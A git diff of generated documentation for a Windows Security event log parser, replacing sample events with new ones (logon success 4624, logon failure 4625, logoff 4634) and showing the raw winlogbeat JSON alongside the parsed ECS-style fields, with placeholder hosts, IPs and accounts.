b/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b.md index 878f041e5..f45915948 100644 --- a/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b.md +++ b/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b.md @@ -1743,67 +1743,229 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "security_event_4648.json" +=== "security_event_4624.json" ```json { - "message": "{\"log\": {\"level\": \"information\"}, \"message\": \"A logon was attempted using explicit credentials.\\\\n\\\\nSubject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-2-3\\\\n\\\\tAccount Name:\\\\t\\\\tSYSTEM\\\\n\\\\tAccount Domain:\\\\t\\\\tDOMAIN\\\\n\\\\tLogon ID:\\\\t\\\\t0x41C1B034B\\\\n\\\\tLogon GUID:\\\\t\\\\t{00000000-0000-0000-0000-000000000000}\\\\n\\\\nAccount Whose Credentials Were Used:\\\\n\\\\tAccount Name:\\\\t\\\\taccount\\\\n\\\\tAccount Domain:\\\\t\\\\tcompany\\\\n\\\\tLogon GUID:\\\\t\\\\t{00000000-0000-0000-0000-000000000000}\\\\n\\\\nTarget Server:\\\\n\\\\tTarget Server Name:\\\\tTARGET.company.com\\\\n\\\\tAdditional Information:\\\\tTARGET.company.com\\\\n\\\\nProcess Information:\\\\n\\\\tProcess ID:\\\\t\\\\t0x8314\\\\n\\\\tProcess Name:\\\\t\\\\tD:\\\\\\\\Program Files (x86)\\\\\\\\Process\\\\\\\\Test\\\\\\\\processname.exe\\\\n\\\\nNetwork Information:\\\\n\\\\tNetwork Address:\\\\t8.8.8.8\\\\n\\\\tPort:\\\\t\\\\t\\\\t12345\\\\n\\\\nThis event is generated when a process attempts to log on an account by explicitly specifying that account\\\\u2019s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.\", \"type\": \"R2\", \"fields\": {\"gdp-indice\": \"l-serve\", \"gdp-parc\": \"defaut\", \"gdp-config\": \"server\", \"gdp-version-sysmon\": 15, \"gdp-sousparc\": \"prod\", \"gdp-version\": \"2.8\", \"gdp-version-winlogbeat\": 3.4}, \"ecs\": {\"version\": \"8.0.0\"}, \"agent\": {\"name\": \"WB-SRV-HOST01\", \"type\": \"winlogbeat\", \"version\": \"8.8.2\", \"ephemeral_id\": \"06ad3222-a4be-4b59-9958-5f9a657ea9f1\", \"id\": \"2c0cd63b-3836-4620-9eb8-13202bd370a3\"}, \"fields.gdp-redis\": \"2\", \"event\": {\"provider\": \"Microsoft-Windows-Security-Auditing\", \"kind\": \"event\", \"code\": \"4648\", \"action\": \"Logon\", \"created\": \"2023-11-09T09:05:15.197Z\", \"outcome\": \"success\"}, \"winlog\": {\"event_id\": \"4648\", \"keywords\": [\"Audit Success\"], \"provider_guid\": \"{54849625-5478-4994-A5BA-3E3B0328C30D}\", \"event_data\": {\"SubjectUserName\": \"SYSTEM\", \"IpPort\": \"12345\", \"TargetInfo\": \"TARGET.company.com\", \"TargetLogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"TargetUserName\": \"account\", \"TargetServerName\": \"TARGET.company.com\", \"ProcessName\": \"D:\\\\\\\\Program Files (x86)\\\\\\\\Process\\\\\\\\Test\\\\\\\\processname.exe\", \"SubjectUserSid\": \"S-1-2-3\", \"IpAddress\": \"8.8.8.8\", \"TargetDomainName\": \"company\", \"SubjectDomainName\": \"DOMAIN\", \"ProcessId\": \"0x8314\", \"LogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"SubjectLogonId\": \"0x41c1b034b\"}, \"process\": {\"pid\": 848, \"thread\": {\"id\": 22916}}, \"provider_name\": \"Microsoft-Windows-Security-Auditing\", \"computer_name\": \"HOST01.company.com\", \"opcode\": \"Info\", \"task\": \"Logon\", \"channel\": \"Security\", \"api\": \"wineventlog\", \"record_id\": 8500947825, \"activity_id\": \"{7E156DC4-0D77-0008-C56D-157E770DDA01}\"}, \"@timestamp\": \"2023-11-09T09:05:14.415Z\", \"host\": {\"name\": \"HOST01\", \"id\": \"abcdefgh-1234-5678-abcd-efgh12345678\", \"mac\": [\"00-00-00-00-00-00-00-E0\", \"00-11-22-33-44-55\"], \"architecture\": \"x86_64\", \"os\": {\"platform\": \"windows\", \"version\": \"10.0\", \"name\": \"Windows Server 2016 Standard\", \"build\": \"14393.6351\", \"kernel\": \"10.0.14393.6343 (rs1_release.230913-1727)\", \"type\": \"windows\", \"family\": \"windows\"}, \"hostname\": \"HOST01\", \"ip\": [\"1.2.3.4\", \"fe80::abcd:123:456\"]}, \"event_ingest_logstash\": \"2023-11-09T09:05:14.912238Z\", \"fields.gdp-logstash\": \"5\", \"@version\": \"1\"}", + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", "event": { - "action": "Logon", - "code": "4648", + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4624", "kind": "event", "module": "security", - "original": "A logon was attempted using explicit credentials.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tSYSTEM\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x41C1B034B\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nAccount Whose Credentials Were Used:\\n\\tAccount Name:\\t\\taccount\\n\\tAccount Domain:\\t\\tcompany\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nTarget Server:\\n\\tTarget Server Name:\\tTARGET.company.com\\n\\tAdditional Information:\\tTARGET.company.com\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x8314\\n\\tProcess Name:\\t\\tD:\\\\Program Files (x86)\\\\Process\\\\Test\\\\processname.exe\\n\\nNetwork Information:\\n\\tNetwork Address:\\t8.8.8.8\\n\\tPort:\\t\\t\\t12345\\n\\nThis event is generated when a process attempts to log on an account by explicitly specifying that account\\u2019s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.", - "outcome": "success", - "provider": "Microsoft-Windows-Security-Auditing" + "original": "An account was successfully logged on.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tWS-USER-01$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nLogon Information:\n\tLogon Type:\t\t3\n\tRestricted Admin Mode:\t-\n\tVirtual Account:\t\tNo\n\tElevated Token:\t\tNo\n\nImpersonation Level:\t\tImpersonation\n\nNew Logon:\n\tSecurity ID:\t\tS-4-5-6\n\tAccount Name:\t\ttarget_user\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0xFCEBB74A\n\tLinked Logon ID:\t\t0x0\n\tNetwork Account Name:\t-\n\tNetwork Account Domain:\t-\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\n\nProcess Information:\n\tProcess ID:\t\t0x2f0\n\tProcess Name:\t\tC:\\Windows\\System32\\executable.exe\n\nNetwork Information:\n\tWorkstation Name:\tWS-USER-01\n\tSource Network Address:\t1.2.3.4\n\tSource Port:\t\t29051\n\nDetailed Authentication Information:\n\tLogon Process:\t\tProcess \n\tAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\n\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\n\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\n\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.", + "type": [ + "start" + ] }, - "@timestamp": "2023-11-09T09:05:14.415000Z", + "@timestamp": "2024-11-12T08:41:05.803000Z", "action": { - "id": 4648, + "id": 4624, "outcome": "success", "properties": { - "IpAddress": "8.8.8.8", - "IpPort": "12345", + "AuthenticationPackageName": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", + "ElevatedToken": "%%1843", + "ImpersonationLevel": "%%1833", + "IpAddress": "1.2.3.4", + "IpPort": "29051", + "KeyLength": "0", + "LmPackageName": "-", "LogonGuid": "{00000000-0000-0000-0000-000000000000}", - "ProcessId": "0x8314", - "ProcessName": "D:\\\\Program Files (x86)\\\\Process\\\\Test\\\\processname.exe", + "LogonProcessName": "Process ", + "LogonType": "3", + "ProcessId": "0x2f0", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "RestrictedAdminMode": "-", "SubjectDomainName": "DOMAIN", - "SubjectLogonId": "0x41c1b034b", - "SubjectUserName": "SYSTEM", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WS-USER-01$", "SubjectUserSid": "S-1-2-3", - "TargetDomainName": "company", - "TargetInfo": "TARGET.company.com", - "TargetLogonGuid": "{00000000-0000-0000-0000-000000000000}", - "TargetServerName": "TARGET.company.com", - "TargetUserName": "account" + "TargetDomainName": "DOMAIN", + "TargetLinkedLogonId": "0x0", + "TargetLogonId": "0xfcebb74a", + "TargetOutboundDomainName": "-", + "TargetOutboundUserName": "-", + "TargetUserName": "target_user", + "TargetUserSid": "S-4-5-6", + "TransmittedServices": "-", + "VirtualAccount": "%%1843", + "WorkstationName": "WS-USER-01" } }, "agent": { - "ephemeral_id": "06ad3222-a4be-4b59-9958-5f9a657ea9f1", - "id": "2c0cd63b-3836-4620-9eb8-13202bd370a3", - "name": "WB-SRV-HOST01", + "ephemeral_id": "12345678-1234-5678-9012-123456789012", + "id": "abcd1234-abcd-1234-ef56-abcdef123456", "type": "winlogbeat", - "version": "8.8.2" + "version": "7.0.0" + }, + "client": { + "ip": "1.2.3.4" }, "host": { "architecture": "x86_64", - "hostname": "HOST01", - "id": "abcdefgh-1234-5678-abcd-efgh12345678", + "hostname": "hostname", + "id": "abcdefab-1234-5678-9012-abcdefabcdef", + "name": "hostname", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Datacenter", + "platform": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Process " + } + }, + "client": { + "name": "WS-USER-01", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "user": { + "id": "S-1-2-3", + "name": "WS-USER-01$", + "target": { + "domain": "DOMAIN", + "id": "S-4-5-6", + "name": "target_user" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "hostname.company.com", + "event_id": "4624", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 752, + "thread": { + "id": 7960 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1170100815", + "task": "Logon", + "version": 2 + } + } + + ``` + + +=== "security_event_4625.json" + + ```json + + { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4625", + "kind": "event", + "module": "security", + "outcome": "failure", + "provider": "Microsoft-Windows-Security-Auditing", + "reason": "user_not_exist", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-12T08:40:34.260000Z", + "action": { + "id": 4625, + "outcome": "failure", + "properties": { + "AuthenticationPackageName": "Kerberos", + "FailureReason": "%%2313", + "IpAddress": "-", + "IpPort": "-", + "KeyLength": "0", + "LmPackageName": "-", + "LogonProcessName": "Channel", + "LogonType": "3", + "ProcessId": "0x338", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "Status": "0xc000006d", + "SubStatus": "0xc0000064", + "SubjectDomainName": "J_DOE", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WORKSTATION$", + "SubjectUserSid": "S-1-2-3", + "TargetUserSid": "S-1-0-0", + "TransmittedServices": "-", + "WorkstationName": "WORKSTATION" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "WORKSTATION", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", "ip": [ "1.2.3.4", - "fe80::abcd:123:456" + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" ], "mac": [ - "00-00-00-00-00-00-00-E0", - "00-11-22-33-44-55" + "00-00-00-00-00-00-00-00", + "11-11-11-11-11-11", + "A0-B1-C2-D3-E4-F5", + "AA-BB-CC-DD-EE-FF" ], - "name": "HOST01", + "name": "hostname", "os": { - "build": "14393.6351", + "build": "14393.7428", "family": "windows", - "kernel": "10.0.14393.6343 (rs1_release.230913-1727)", - "name": "Windows Server 2016 Standard", + "kernel": "10.0.14393.7426 (rs1_release.240926-1524)", + "name": "Windows Server 2016 Datacenter", "platform": "windows", "type": "windows", "version": "10.0" @@ -1813,63 +1975,99 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "level": "information" }, "process": { - "executable": "D:\\\\Program Files (x86)\\\\Process\\\\Test\\\\processname.exe", - "name": "processname.exe", - "pid": 33556 + "executable": "C:\\Windows\\System32\\executable.exe", + "name": "executable.exe", + "pid": 824 }, "related": { "hosts": [ - "HOST01" + "WORKSTATION", + "hostname" ], "ip": [ "1.2.3.4", - "8.8.8.8", - "fe80::abcd:123:456" - ], - "user": [ - "account" + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Channel" + } + }, + "client": { + "name": "WORKSTATION", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "server": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" ] }, "source": { - "address": "8.8.8.8", - "ip": "8.8.8.8", - "port": 12345 + "address": "WORKSTATION", + "domain": "WORKSTATION", + "port": 0 }, "user": { - "domain": "company", - "effective": { - "domain": "company", - "name": "account" - }, "id": "S-1-2-3", - "name": "account", + "name": "WORKSTATION$", "target": { - "domain": "company", - "name": "account" + "id": "S-1-0-0" } }, "winlog": { - "activity_id": "{7e156dc4-0d77-0008-c56d-157e770dda01}", + "activity_id": "{12345678-abcd-efab-cdef-123456789012}", "api": "wineventlog", "channel": "Security", - "computer_name": "HOST01.company.com", - "event_id": "4648", + "computer_name": "WORKSTATION.johndoe.com", + "event_id": "4625", "keywords": [ - "Audit Success" + "Audit Failure" ], "logon": { - "id": "0x41c1b034b" + "failure": { + "reason": "Unknown user name or bad password.", + "status": "This is either due to a bad username or authentication information", + "sub_status": "User logon with misspelled or bad user account" + }, + "id": "0x3e7", + "type": "Network" }, "opcode": "Info", "process": { - "pid": 848, + "pid": 824, "thread": { - "id": 22916 + "id": 28936 } }, "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", "provider_name": "Microsoft-Windows-Security-Auditing", - "record_id": "8500947825", + "record_id": "2552812283", "task": "Logon" } } @@ -1877,66 +2075,57 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "security_event_4688.json" +=== "security_event_4634.json" ```json { - "message": "{\"tags\": [\"beats_input_codec_plain_applied\"], \"event\": {\"original\": \"A new process has been created.\\\\n\\\\nCreator Subject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-1-1\\\\n\\\\tAccount Name:\\\\t\\\\tHOST01$\\\\n\\\\tAccount Domain:\\\\t\\\\tCOMPANY\\\\n\\\\tLogon ID:\\\\t\\\\t0x3E7\\\\n\\\\nTarget Subject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-0-0\\\\n\\\\tAccount Name:\\\\t\\\\t-\\\\n\\\\tAccount Domain:\\\\t\\\\t-\\\\n\\\\tLogon ID:\\\\t\\\\t0x0\\\\n\\\\nProcess Information:\\\\n\\\\tNew Process ID:\\\\t\\\\t0x1d9c\\\\n\\\\tNew Process Name:\\\\tC:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\\\\n\\\\tToken Elevation Type:\\\\tTokenElevationTypeDefault (1)\\\\n\\\\tMandatory Label:\\\\t\\\\tS-1-2-3\\\\n\\\\tCreator Process ID:\\\\t0x2a0\\\\n\\\\tCreator Process Name:\\\\tC:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\services.exe\\\\n\\\\tProcess Command Line:\\\\tC:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\\\\n\\\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\\\n\\\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\\\n\\\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\\\n\\\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.\", \"action\": \"Process Creation\", \"kind\": \"event\", \"outcome\": \"success\", \"created\": \"2023-11-09T08:43:52.407Z\", \"provider\": \"Microsoft-Windows-Security-Auditing\", \"code\": \"4688\"}, \"@version\": \"1\", \"@timestamp\": \"2023-11-09T08:43:51.462Z\", \"message\": \"A new process has been created.\\\\n\\\\nCreator Subject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-1-1\\\\n\\\\tAccount Name:\\\\t\\\\tHOST01$\\\\n\\\\tAccount Domain:\\\\t\\\\tCOMPANY\\\\n\\\\tLogon ID:\\\\t\\\\t0x3E7\\\\n\\\\nTarget Subject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-0-0\\\\n\\\\tAccount Name:\\\\t\\\\t-\\\\n\\\\tAccount Domain:\\\\t\\\\t-\\\\n\\\\tLogon ID:\\\\t\\\\t0x0\\\\n\\\\nProcess Information:\\\\n\\\\tNew Process ID:\\\\t\\\\t0x1d9c\\\\n\\\\tNew Process Name:\\\\tC:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\\\\n\\\\tToken Elevation Type:\\\\tTokenElevationTypeDefault (1)\\\\n\\\\tMandatory Label:\\\\t\\\\tS-1-2-3\\\\n\\\\tCreator Process ID:\\\\t0x2a0\\\\n\\\\tCreator Process Name:\\\\tC:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\services.exe\\\\n\\\\tProcess Command Line:\\\\tC:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\\\\n\\\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\\\n\\\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\\\n\\\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\\\n\\\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.\", \"winlog\": {\"computer_name\": \"HOST01.company.test\", \"provider_name\": \"Microsoft-Windows-Security-Auditing\", \"channel\": \"Security\", \"provider_guid\": \"{54849625-5478-4994-a5ba-3e3b0328c30d}\", \"keywords\": [\"Audit Success\"], \"version\": 2, \"event_id\": \"4688\", \"process\": {\"pid\": 4, \"thread\": {\"id\": 17028}}, \"task\": \"Process Creation\", \"event_data\": {\"ParentProcessName\": \"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\services.exe\", \"TokenElevationType\": \"%%1936\", \"MandatoryLabel\": \"S-1-2-3\", \"TargetUserSid\": \"S-1-0-0\", \"SubjectUserSid\": \"S-1-1-1\", \"SubjectDomainName\": \"COMPANY\", \"SubjectLogonId\": \"0x3e7\", \"CommandLine\": \"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\", \"NewProcessId\": \"0x1d9c\", \"TargetDomainName\": \"-\", \"ProcessId\": \"0x2a0\", \"SubjectUserName\": \"HOST01$\", \"TargetUserName\": \"-\", \"NewProcessName\": 